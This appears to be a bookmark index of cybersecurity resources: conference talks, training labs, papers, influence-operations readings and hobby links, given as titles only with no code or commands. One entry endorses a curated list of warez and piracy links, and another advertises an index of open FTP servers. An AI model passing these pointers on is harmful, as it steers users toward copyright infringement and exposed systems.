JavaDeserH2HC | 491 | over 2 years ago | : Sample codes written for the Hackers to Hackers Conference magazine 2017 (H2HC) |
H2HC 2021 | |||
CSIRT / Resources / Conferences and Slides / CCC: | |||
Modchips of the State | : Hardware implants in the supply-chain - CCC 2018 | ||
CSIRT / Resources / Conferences and Slides / BlackHat: | |||
Cybersecurity as Realpolitik | 2014 Keynote: , amazing keynote by Dan Geer (Geertinho) | ||
Kudelski Security's 2018 pre-Black Hat crypto challenge | 36 | about 6 years ago | |
Expert demonstrated a new PHP code execution attack | 2018: | ||
CSIRT / Resources / Conferences and Slides / BlackHat: / 2021: | |||
supply chain issues talk | |||
MFA-ing the Un-MFA-ble: Protecting Auth Systems' Core Secrets | |||
CSIRT / Resources / Conferences and Slides / DEFCON: | |||
Doublethink | 2018: : 8-Architecture Assembly Polyglot by Robert Xiao | ||
SAFEMODE | 2020: , , , | ||
CSIRT / Resources / Conferences and Slides / DEFCON: / 2021: | |||
OpenSOC Blue Team CTF @ DEFCON 29 FAQ | |||
Using Barq to perform AWS Post-Exploitation Actions | |||
CSIRT / Resources / Conferences and Slides | |||
SBSeg 2018 | : Simpósio Brasileiro em Segurança da Informação e de Sistemas Computacionais (SBSeg), the Brazilian Symposium on Information and Computational Systems Security | ||
CSIRT / Resources / Conferences and Slides / Objective by the Sea (2018): | |||
APFS Internals | Jonathan Levin | ||
Protecting the Garden of Eden | Patrick Wardle | ||
Code signing flaw in macOS | Thomas Reed | ||
From Apple Seeds to Apple Pie | Sarah Edwards | ||
When Macs Come Under ATT&CK | Richie Cyrus | ||
Crashing to Root | Brandon Azad | ||
Leveraging Apple's Game Engine for Advanced Threat Detection | Josh Stein / Jon Malm | ||
MacDoored | Jaron Bradley | ||
Who Moved my Pixels? | Mikhail Sosonkin | ||
Aliens Among Us | Michael Lynn | ||
CSIRT / Resources / Conferences and Slides | |||
An Introduction To Binary Exploitation | 341 | almost 6 years ago | BlackHoodie 2018 Workshop: |
r2con2020 | |||
CSIRT / Resources / Conferences and Slides / r2con2020 | |||
workshop: semi-automatic code deobfuscation | 76 | about 3 years ago | |
r2con2020 DAY3 Live Stream | |||
CSIRT / Resources / Conferences and Slides | |||
hack.lu | : | ||
MISP Summit 05 | : MISP Threat Intelligence Summit 0x05 at hack.lu 2019. Practical threat intelligence and information sharing for everyone | ||
Hack.lu 2019 Day #1 Wrap-Up | |||
The Open Source Security Software | |||
Hack.lu 2021 Stonks Socket | |||
How to R&D hacking toys for fun & no-profit | |||
Security Guidelines for Congressional Campaigns | |||
From Assembly to JavaScript and back | 20 | over 6 years ago | (OffensiveCon2018) |
ARM-based IoT Exploit Development | |||
An Introduction to Threat Intelligence and Threat Hunting for Companies Without an Infinite Budget | (pt-br) | ||
Presentations | 181 | 7 days ago | Outflank |
The Art of De-obfuscation | |||
Smartphone Privacy | : How Your Smartphone Tracks Your Entire Life | ||
Fun with LDAP and Kerberos in AD environments | |||
Analysis and recommendations for standardization in penetration testing and vulnerability assessment | |||
The Second Crypto War—What's Different Now | (by Susan Landau, Bridge Professor of Cyber Security and Policy, Tufts University) | ||
Malware: Anti-forensics | |||
The 35C3 halfnarp | |||
SeL4-Enabled Security Mechanisms for Cyber-Physical Systems | |||
Mojave's Sandbox is Leaky | |||
Code Obfuscation 10*2+(2a+3)%2 | |||
DeepState | : Bringing vulnerability detection tools into the development lifecycle; DeepState: Symbolic Unit Testing for C and C++ | ||
Hardware Memory Tagging to make C/C++ memory safe(r) | 11,517 | 21 days ago | |
wallet.fail | : Hacking the most popular cryptocurrency hardware wallets | ||
Reverse Engineering | : Closed, heterogeneous platforms and the defenders' dilemma. Looking back at the last 20 years of RE and looking ahead at the next few. SSTIC 2018, Thomas Dullien ("Halvar Flake") | ||
Making C Less Dangerous in the Linux kernel | |||
Workshop-BSidesMunich2018 | 106 | over 6 years ago | : ARM shellcode and exploit development - BSidesMunich 2018 |
REhint's Publications | 356 | almost 5 years ago | |
INFILTRATE 2019 Demo Materials | 340 | over 1 year ago | |
A Practical Approach to Purple Teaming | |||
The Advanced Threats Evolution: REsearchers Arm Race | 356 | almost 5 years ago | by @matrosov |
The Beginner Malware Analysis Course + VirusBay Access | |||
ConPresentations | 360 | about 1 year ago | by Maddie Stone |
Venturing into the Dark | a review of Dark Side Ops 2: Adversary Simulation | ||
Expert voices disinvited from CyberCon | |||
0x0g-2018-badge | 19 | over 6 years ago | |
Virtual Cybersecurity Conferences | 116 | over 3 years ago | : An ongoing list of virtual cybersecurity conferences |
The speaker and schedule data for GrayHat to populate Hacker Tracker and the main GrayHat website. | 0 | over 4 years ago | |
Offensive Development | 241 | 5 months ago | : Post-Exploitation Tradecraft in an EDR World (x33fcon 2020) |
WebSploit Labs workshop hosted by the Red Team Village during YASCON | 1 | about 4 years ago | |
The AVAR International Conference is back! | |||
Japan Security Analyst Conference Virtual Edition | |||
{baby,mama,gran}-a-fallen-lap-ray DEFCON 2021 Quals | 8 | over 3 years ago | |
Developing Secure Systems Summit (DS3) | : The state of the art in developing secure computer systems is advancing rapidly, with progress in several communities around the world spanning the software industry, academia, research labs, and governments | ||
MODERN TECHNIQUES TO DEOBFUSCATE AND UEFI/BIOS MALWARE | HITBSecConf2019 Amsterdam | ||
PoC demo for HITB Amsterdam 2021 | 2 | over 3 years ago | : Playing hide-n-seek with AWS GuardDuty: Post-DNS era covert channel for C&C and data exfiltration |
Securing Cyber-Physical Systems: moving beyond fear | |||
Speaking materials from conferences | 9 | over 2 years ago | by Tim Scythe |
TheGlasshouseCtr | |||
Open Source Security Day on Google Open Source Live | |||
hardik05 | 32 | about 2 years ago | : My conference presentations and materials for them |
30th USENIX Security Symposium | |||
The Hijackers' Guide to the Galaxy: Off-path Taking over Internet Resources | |||
CSIRT / Resources / Sans / Quiz: | |||
April 2021 Forensic Quiz | |||
May 2021 Forensic Contest | |||
June 2021 Forensic Contest | , | ||
CSIRT / Resources / Sans | |||
Quick Analysis of a Modular InfoStealer | |||
Example of Cleartext Cobalt Strike Traffic | |||
SEC642 papers | 3 | over 3 years ago | : This repository is a collection of papers used in the course that have been deprecated on the wider internet |
"Serverless" Phishing Campaign | |||
SANS CTI Summit 2021 | 102 | about 1 year ago | |
SANS Virtual Summits Will Be FREE for the Community in 2021 | |||
Random Forests: Still Useful? | |||
CSIRT / psyops | |||
Read the Pentagon’s 20-Page Report on Its Own Meme | |||
Bezmenov’s Steps (Ideological Subversion) | |||
PAUL LAZARSFELD—THE FOUNDER OF MODERN EMPIRICAL SOCIOLOGY: A RESEARCH BIOGRAPHY | |||
Influence Operations 101 - Media Effects | |||
Hazard Mapping | : The information architecture of ethics, a draft proposal | ||
Cognitive Warfare | |||
CSIRT / Sources | |||
hasherezade's 1001 nights | |||
CSIRT / Sources / hasherezade's 1001 nights | |||
How to start RE/malware analysis? | hasherezade's 1001 nights | |||
CSIRT / Sources | |||
List of Helpful Information Security Multimedia | 396 | over 6 years ago | |
pocorgtfo | 1,315 | 9 months ago | : a "PoC or GTFO" mirror with extra article index, direct links and clean PDFs |
FIDO ECDAA Algorithm | |||
stamparm | : Miroslav Stampar Repositories (a lot of good stuff) | ||
CSIRT / Sources / Github repos: | |||
gabrielmachado | |||
CSIRT / Sources / Damn Vulnerable Web Application: | |||
Damn Vulnerable Web Application Docker container | |||
Damn Vulnerable Web Application (DVWA) | 10,292 | 14 days ago | |
Damn Vulnerable C Program | 676 | about 1 month ago | : a C program containing vulnerable code for common types of vulnerabilities; can be used to show fuzzing concepts |
CSIRT / Sources | |||
vvmlist | : vulnerable virtual machine list is a list of vulnerable vms with their attributes | ||
Source | 10 | 4 months ago | Nelson Brito's: This repository is a collection of information, code and/or tools, which I've released and/or presented at some of the most notorious conferences, helping the audience to study and understand some cybersecurity-related topics |
PwnLab: init | (pt-br) | ||
Mamont's open FTP Index | : a lot of open FTPs!!! | ||
fuzz.txt | 2,884 | 25 days ago | : Potentially dangerous files |
Free Training: New Certified Learning Paths | : The Qualys Training team is eager to share all of the recent additions to our free training program, as well as provide insight into what is coming in 2019. You can expect to see regular updates as we continue to improve our training offerings! | ||
Catálogo de Fraudes | (pt-br) : Launched in 2008 to alert the teaching and research community to the main scams circulating on the internet, our Fraud Catalogue is today an important repository of messages classified as fraudulent, serving as a source of information for all of Brazil | ||
Daily Information Security Podcast ("StormCast") | |||
Hackerrank | 5 | about 3 years ago | : Contains code for some of the solutions to HackerRank problems |
I may have found Omega Weapon: One Powerful, Terrifying Monster Forming the Upper Reaches of Another, Much More Powerful & Terrifying Monster | . #CyberpunkisNow is a project producing Digital Privacy/Anonymity, Counter-Surveillance, Hacking, Technology, Information Security/Cyber Security, Science & Open Source Intelligence content meant to educate, establish/maintain a public dialogue & create awareness regarding the ways technology continues to permeate civilization | ||
Exodus Research Community | |||
2021 Annual Threat Assessment | of the US Intelligence Community | ||
Hamid's Bookmarks | 124 | 10 days ago | |
EP 67: THE BIG HOUSE | DARKNET DIARIES: | ||
Wrong Secrets | 1,236 | 4 days ago | : Examples of how not to use secrets |
Vulnserver | 1,001 | about 4 years ago | : Vulnerable server used for learning software exploitation |
CSIRT / Fun | |||
Spoilerwall introduces a brand new concept in the field of network hardening | 761 | over 4 years ago | |
abusing github commit history for the lulz | 8,069 | 25 days ago | |
resist_oped | 201 | about 6 years ago | : 🕵🏽♀️ Identifying the author behind the New York Times' op-ed from inside the Trump White House |
InfoSec BS Bingo | |||
How to fit all of Shakespeare in one tweet (and why not to do it!) | |||
Attrition.org | : defacement rank | ||
rot8000 | : rot13 for the Unicode generation | ||
Reverse Engineering Pokémon GO Plus | : TL;DR: You can clone a Pokémon GO Plus device that you own. GitHub repo | ||
grugq quotes | |||
Pivots & Payloads Board Game | : Introducing the NEW SANS Pen Test Poster by SANS Institute | ||
Chess Steganography | |||
Enigma, the Bombe, and Typex | 29,255 | 30 days ago | |
An icon of Second World War cryptography, the Enigma machine has a surviving example in Brazil | (pt-br) | ||
Enigma machine | : This is a simulated Enigma machine. Letters to be encrypted enter at the boundary, move through the wire matrix, and exit | ||
How I hacked modern Vending Machines | |||
A better zip bomb | |||
Goodbye-World | 59 | about 6 years ago | : The last program that every developer writes |
Dumb Password Rules | 2,990 | 18 days ago | |
Enigma I, Navy M3/M4 | |||
FYI, I'm going to drive home on Florida's Turnpike with a code that QR-enabled license plate readers will log in their ASCII databases ... which could trigger #antivirus software to QUARANTINE those databases | by Rob Rosenberger | ||
pivoting | (pt-br) | ||
Posters, drawings... | 10,521 | 9 months ago | |
"Other good cyberpunk media to stream free on Tubi: Akira https://t.co/zNFOXzkdMP Ghost in the Shell https://t.co/ayGKJsGXsf Jin-Roh https://t.co/V6KUA0icSc Ergo Proxy https://t.co/uQv9WNGnHT AD Police https://t.co/UNBioD26MB Chappie https://t.co/YmLabtxk4z" | |||
THE BEIRUT BANK JOB | |||
BitmapFonts | 1,781 | almost 4 years ago | : My collection of bitmap fonts pulled from various demoscene archives over the years |
types of papers | XKCD | ||
Insufficient input validation in the Marvin Minsky 1967 implementation of the Universal Turing Machine allows program users to execute arbitrary code via crafted data. | |||
How the Xbox 360 DVD Security was Defeated | and - MVG | ||
I was going through my notes this morning and thought CVE-2021-21985 was important to cover | |||
APPSEC EZINE | |||
ZeroVer: 0-based Versioning | |||
The Cartoon Guide to Computer Science | |||
LENS CALCULATOR | : Calculate CCTV camera lens focal length, pixel density and camera zones in 3D | ||
Awesome Piracy | 24,325 | over 1 year ago | : A curated list of awesome warez and piracy links |
An RCE in the POC by Jonathan Scott for the RCE V1.0 PoC iOS 15.0.1 | |||
What is von Clausewitz centers of gravity (cogs) concept? | |||
Place where a stealth fighter was caught on Google Maps | |||
High-Security Mechanical Locks | |||
Tetsuji | : Remote Code Execution on a GameBoy Colour 22 Years Later | ||
KeyDecoder | 3,061 | 10 months ago | app lets you use your smartphone or tablet to decode your mechanical keys in seconds |
Comparative Study of Anti-cheat Methods in Video Games | by Samuli Lehtonen | ||
CSIRT / Articles | |||
The Accidental Altruist: Inferring Altruism from an Extraterrestrial Signal | |||
Interstellar communication. IX. Message decontamination is impossible | |||
[1808.00659] Chaff Bugs: Deterring Attackers by Making Software Buggier | |||
[1809.08325] The Rise of Certificate Transparency and Its Implications on the Internet Ecosystem | |||
DeepMasterPrints: Generating MasterPrints for Dictionary Attacks via Latent Variable Evolution | |||
Stealing Webpages Rendered on Your Browser by Exploiting GPU Vulnerabilities | |||
The Hunt for 3ve | : Taking down a major ad fraud operation through industry collaboration | ||
Page Cache Attacks | : We present a new hardware-agnostic side-channel attack that targets one of the most fundamental software caches in modern computer systems: the operating system page cache | ||
Identification and Illustration of Insecure Direct Object References and their Countermeasures | |||
China’s Maxim | : Leave No Access Point Unexploited: The Hidden Story of China Telecom’s BGP Hijacking | ||
Listen to Your Key: Towards Acoustics-based Physical Key Inference | |||
Mailto: Me Your Secrets. On Bugs and Features in Email End-to-End Encryption | |||
Everything Old is New Again: Binary Security of WebAssembly | |||
Discovering Suspicious APT Behaviors by Analyzing DNS Activities | |||
Harvard Belfer National Cyber Power Index 2020 | |||
Quantum Blockchain using entanglement in time | |||
Reflections on Trusting Trust | |||
I See Dead µops: Leaking Secrets via Intel/AMD Micro-Op Caches | |||
BIAS: Bluetooth Impersonation AttackS | |||
LOKI: Hardening Code Obfuscation Against Automated Attacks | |||
FPGA-Based Near-Memory Acceleration of Modern Data-Intensive Applications | |||
CSIRT / Other Repos | |||
mubix | 94 | about 3 years ago |